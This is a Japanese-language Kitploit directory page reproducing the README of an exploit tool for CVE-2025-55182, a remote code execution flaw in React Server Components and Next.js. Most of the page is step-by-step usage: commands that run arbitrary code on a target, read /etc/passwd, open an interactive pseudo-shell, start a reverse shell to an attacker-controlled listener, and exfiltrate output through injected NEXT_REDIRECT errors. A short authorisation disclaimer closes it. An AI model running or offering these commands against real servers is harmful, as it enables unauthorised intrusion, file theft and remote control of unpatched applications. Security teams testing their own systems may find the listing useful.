Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
react2shell-poc — CVE-2025-55182 React2Shell PoC - React Server Components / Next.js における重大な RCE(リモートコード実行)。CVSS 10.0。エラーベースのデータ外部漏えい、リバースシェル、インタラクティブモード対応。 | Kitploit
ツール/GitHubGitHub/p3ta00/react2shell-poc
ペイロード生成脆弱性分析エクスプロイトウェブアプリケーション悪用ペネトレーションテストコマンド&コントロール学習と教育リモートアクセスツール
GitHubp3ta00/react2shell-poc

react2shell-poc

CVE-2025-55182 React2Shell PoC - React Server Components / Next.js における重大な RCE(リモートコード実行)。CVSS 10.0。エラーベースのデータ外部漏えい、リバースシェル、インタラクティブモード対応。

リポジトリを見る
9123ヶ月前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

React2Shell - CVE-2025-55182 PoC

CVE-2025-55182 に対する概念実証(PoC)です。これは、React Server Components における認証不要の重大なリモートコード実行(RCE)脆弱性です。

CVSS スコア: 10.0(Critical)

脆弱性

この脆弱性は、React の Flight プロトコルデシリアライザに存在します。特別に細工されたペイロードによるプロトタイプ汚染を悪用することで、攻撃者は脆弱な Next.js アプリケーション上で任意のコード実行を達成できます。

影響を受けるバージョン

製品影響を受ける修正済み
React19.0.0 - 19.2.019.0.1, 19.1.2, 19.2.1+
Next.js14.3.0-canary.77 - 16.x15.0.5, 15.1.9, 15.2.6, 16.0.7+

インストール

root@kitploit:~
git clone https://github.com/p3ta00/react2shell-poc.git
cd react2shell-poc
pip install requests

使用方法

出力を伴うコマンド実行(デフォルト:エラーベースの外部送信)

出力は NEXT_REDIRECT エラーを介して HTTP レスポンス内に直接返されます。コールバックサーバーは不要です。

root@kitploit:~
python3 react2shell-poc.py -t http://TARGET:3000 -c "id"
python3 react2shell-poc.py -t http://TARGET:3000 -c "cat /etc/passwd"

対話モード

root@kitploit:~
python3 react2shell-poc.py -t http://TARGET:3000 -i

脆弱性の確認

root@kitploit:~
python3 react2shell-poc.py -t http://TARGET:3000 --check

ブラインド RCE(出力なし)

root@kitploit:~
python3 react2shell-poc.py -t http://TARGET:3000 -c "touch /tmp/pwned" --blind

リバースシェル

root@kitploit:~
# Start listener
nc -lvnp 4444

# Send payload
python3 react2shell-poc.py -t http://TARGET:3000 --revshell --lhost YOUR_IP --lport 4444

レガシー:コールバックベースの外部送信

root@kitploit:~
python3 react2shell-poc.py -t http://TARGET:3000 -c "id" --listen --lhost YOUR_IP

オプション

root@kitploit:~
-t, --target       Target URL (required)
-c, --command      Command to execute (output via error-based exfil by default)
--check            Check if target is vulnerable
--blind            Blind RCE mode (no output capture)
--listen           Use callback server instead of error-based exfil
-i, --interactive  Interactive pseudo-shell mode
--revshell         Attempt reverse shell
--lhost            Attacker IP for callbacks/reverse shell
--lport            Callback port (default: 9999)
--callback         Manual callback URL
--timeout          Request timeout in seconds (default: 30)

動作の仕組み

デフォルトの外部送信方法は、NEXT_REDIRECT エラー注入 を使用します。

  1. コマンドを実行し、出力を取得する
  2. 出力を digest フィールドに含めた NEXT_REDIRECT エラーをスローする
  3. Next.js が Flight レスポンス内でエラーをシリアライズする
  4. 出力が HTTP レスポンス本文に直接表示される

これは、ターゲットからの外向きネットワークアクセスを必要としないため、コールバックベースの外部送信よりも信頼性が高くなります。

参照

  • Wiz Security - React2Shell の公開情報
  • Datadog Security Labs の分析
  • NVD - CVE-2025-55182

免責事項

このツールは、許可されたセキュリティテストおよび教育目的にのみ 使用してください。コンピュータシステムへの不正アクセスは違法です。テストを行う前に必ず適切な許可を取得してください。

作者

p3ta

ツールをダウンロード